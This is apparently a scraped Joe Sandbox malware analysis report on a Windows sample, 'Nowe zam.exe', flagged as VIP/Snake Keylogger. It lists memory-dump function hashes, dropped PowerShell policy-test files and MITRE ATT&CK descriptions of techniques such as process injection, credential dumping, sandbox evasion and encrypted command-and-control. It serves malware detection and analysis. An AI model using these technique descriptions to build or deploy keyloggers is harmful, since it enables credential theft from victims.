Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e143bbe8445d2fe242c0453728ee4bde86dd2e0b1255d139b840a5e885f4a3ae
Instruction ID: a9c782d9942afc86296c76610e54bcdb794044dffb89e94c92874d1851e8388a
Opcode Fuzzy Hash: e143bbe8445d2fe242c0453728ee4bde86dd2e0b1255d139b840a5e885f4a3ae
Instruction Fuzzy Hash: 59E02631D643E68FC702E7B09C200EFBB38ADC2111B59869BC0A577091EF34565DC7A1

Function 00F228B0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 573cbd215b13081667ef682eb5c7bc1ed33efaae8f85ac3f23f34bacff878172
Instruction ID: 7646d466cd161bf72352935b2ba85b02f33d58e5121708f48fef7e778f0d09b8
Opcode Fuzzy Hash: 573cbd215b13081667ef682eb5c7bc1ed33efaae8f85ac3f23f34bacff878172
Instruction Fuzzy Hash: 41D01732D202AA978B04A6A6DC048EEF73DEE96221B908626D52437140EB706669C7E1

Function 00F28EF8 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction ID: 06f4e8e7bf03a6eefdb0371cf3ff17fa3ab4e50e5e6788f302da61fb46136bab
Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction Fuzzy Hash: 1AC08C3360E1382AA234104E7C40EA3BB8DC3C13F4A210137FA2CD3240AC429C8221F8

Function 00F26739 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c767acca8968f3cbeb1e75dab521de700f6728af576c8194789d0d39b2b2303
Instruction ID: 5fba4f5c49c4f3637ff67337aa6c54508ffec7f21927dbf8202ef9dbff43fd99
Opcode Fuzzy Hash: 3c767acca8968f3cbeb1e75dab521de700f6728af576c8194789d0d39b2b2303
Instruction Fuzzy Hash: 71D05E7153C35A9BD702AB74AC52B883B12ABA0300F484B69D8018B45AEAF689289A10

Function 00F2AFAD Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eca7eb19a3bf20c1667942156466ae9c4054112fc56d2aaf244fb53598a8ffd7
Instruction ID: 72a7df8992f067a1abe016e729884d27c0aad6ed9cc039b2d7b79ce1b9cb4344
Opcode Fuzzy Hash: eca7eb19a3bf20c1667942156466ae9c4054112fc56d2aaf244fb53598a8ffd7
Instruction Fuzzy Hash: 87D0677BB00008DBCB049F98EC409DDF776FB98221B048116E925A7260C6319965DB60

Function 00F2FF61 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2465652b15e0ca8ce6ad3791d452aca4b2517ae3cf9314b00d54e8ef78e31926
Instruction ID: 0f7cb3046d8a98d2111fdc2b87592e4b5e3883b9708c0c549b8d66b2f4fd7557
Opcode Fuzzy Hash: 2465652b15e0ca8ce6ad3791d452aca4b2517ae3cf9314b00d54e8ef78e31926
Instruction Fuzzy Hash: BCD02B320047428FC30AE728F550C4CFFB5AEC1310344495FC2D88B075DB6066458B41

Function 00F26748 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 331b36a8737a18729460b8efa18a8a424f9d634970eaeda176f930420906b2d1
Instruction ID: a1669950d3231059b265d7faef369f5d0ea6c8947c14177ddcb66b6fb8479ef4
Opcode Fuzzy Hash: 331b36a8737a18729460b8efa18a8a424f9d634970eaeda176f930420906b2d1
Instruction Fuzzy Hash: 0EC0123012031E87D500BBB5FC56B59375AB690300B449615950586519DEF85D244A94

Non-executed Functions

Function 00F226A0 Relevance: 5.1, Strings: 4, Instructions: 71COMMON

Download Yara Rule

Strings

PG, xrefs: 00F2274F
+r^, xrefs: 00F226ED, 00F226F2
PG, xrefs: 00F22708
PG, xrefs: 00F22732

Memory Dump Source

Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd

Similarity

API ID:
String ID: PG$PG$PG$+r^
API String ID: 0-1402843547
Opcode ID: 93e248f2c7edfbe8f4d158820eef61a7627012abae6e712e98e66ff71da5b126
Instruction ID: b544f8a8149b6aeaa1a9fd1fb1f060a7451540b89908bedb070a9f53aab61783
Opcode Fuzzy Hash: 93e248f2c7edfbe8f4d158820eef61a7627012abae6e712e98e66ff71da5b126
Instruction Fuzzy Hash: D821AC34E04258EFDB05EFB9E4157AEBBB2EB85300F1084A99424AB395CB386E05DF51

Function 00F224C0 Relevance: 5.1, Strings: 4, Instructions: 68COMMON

Download Yara Rule

Strings

PG, xrefs: 00F22528
PG, xrefs: 00F22552
PG, xrefs: 00F2256F
Kr^, xrefs: 00F2250D, 00F22512

Memory Dump Source

Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd

Similarity

API ID:
String ID: PG$PG$PG$Kr^
API String ID: 0-3626761598
Opcode ID: ed333a4a8e6a7df4ea54fbb73e854738e0021e7ba5cb9fc0da3ea18c459493e7
Instruction ID: 80cca42f963b6fe8feb567d201176a52987c0d4c7eb7524d4b303118c90d156a
Opcode Fuzzy Hash: ed333a4a8e6a7df4ea54fbb73e854738e0021e7ba5cb9fc0da3ea18c459493e7
Instruction Fuzzy Hash: E921A174E04259DFCB04EBB9E4557AD7BB2EF85300F10C4B99424AB395CB389A05DF40

Function 00F225B0 Relevance: 5.1, Strings: 4, Instructions: 68COMMON

Download Yara Rule

Strings

PG, xrefs: 00F22642
;r^, xrefs: 00F225FD, 00F22602
PG, xrefs: 00F2265F
PG, xrefs: 00F22618

Memory Dump Source

Source File: 00000004.00000002.4771902543.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f20000_MSBuild.jbxd

Similarity

API ID:
String ID: PG$PG$PG$;r^
API String ID: 0-876817749
Opcode ID: be5bf579002b1d8f492a733e3081fa5aa19f148503839a62054245d6a772f2fc
Instruction ID: ef2e19b0bb5ac17a9e0bb210aeba5f57b5a0975e1ce955d74622c7eb07825cda
Opcode Fuzzy Hash: be5bf579002b1d8f492a733e3081fa5aa19f148503839a62054245d6a772f2fc
Instruction Fuzzy Hash: 92217C74E04259AFCB05EFB9E4557AEBBB2FB86300F1084A9D024AB395CB385A05DF41

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Nowe zam.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Networking

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j2q10ipq.soi.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jtgxzhqj.csq.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xgo1nvf3.pt1.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zhxw5dl1.dkv.ps1

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Windows Analysis Report
Nowe zam.exe

Function 090D1EB8 Relevance: 1.7, APIs: 1, Instructions: 244
processCOMMON

Function 090D1EC0 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Function 0097B138 Relevance: 1.7, APIs: 1, Instructions: 204
COMMON

Function 009758EC Relevance: 1.6, APIs: 1, Instructions: 99
COMMON

Function 009744C4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Function 090D1C38 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Function 090D1C36 Relevance: 1.6, APIs: 1, Instructions: 67
injectionCOMMON

Function 0097B128 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Function 0097D742 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Function 090D1D28 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Function 090D1D23 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Function 090D1AA0 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Function 090D1A9C Relevance: 1.6, APIs: 1, Instructions: 62
threadCOMMON

Function 090D1B78 Relevance: 1.6, APIs: 1, Instructions: 53
memoryCOMMON

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre